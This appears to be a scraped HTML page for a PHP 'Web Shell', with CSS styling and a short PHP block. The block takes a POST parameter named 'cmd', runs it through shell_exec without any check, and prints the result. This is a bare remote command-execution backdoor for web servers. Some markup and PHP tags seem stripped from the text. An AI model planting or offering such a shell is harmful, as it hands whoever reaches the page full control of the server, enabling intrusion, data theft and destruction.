<!DOCTYPE html><html lang="en">
<meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1">Web Shell <title>Web Shell</title> <style> * { box-sizing: border-box; } body { font-family: sans-serif; color: rgba(0, 0, 0, .75); } main { margin: auto; max-width: 850px; } pre, input, button { padding: 10px; border-radius: 5px; background-color: #efefef; } label { display: block; } input { width: 100%; background-color: #efefef; border: 2px solid transparent; } input:focus { outline: none; background: transparent; border: 2px solid #e6e6e6; } button { border: none; cursor: pointer; margin-left: 5px; } button:hover { background-color: #e6e6e6; } .form-group { display: flex; padding: 15px 0; } </style> <main> Web Shell
Execute a command
if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (!empty($_POST['cmd'])) { $cmd = $_POST['cmd']; $output = shell_exec($cmd); echo "Output
<pre>" . htmlspecialchars($output, ENT_QUOTES, 'UTF-8') . "</pre>"; } else { echo "No command entered.
"; } } </main>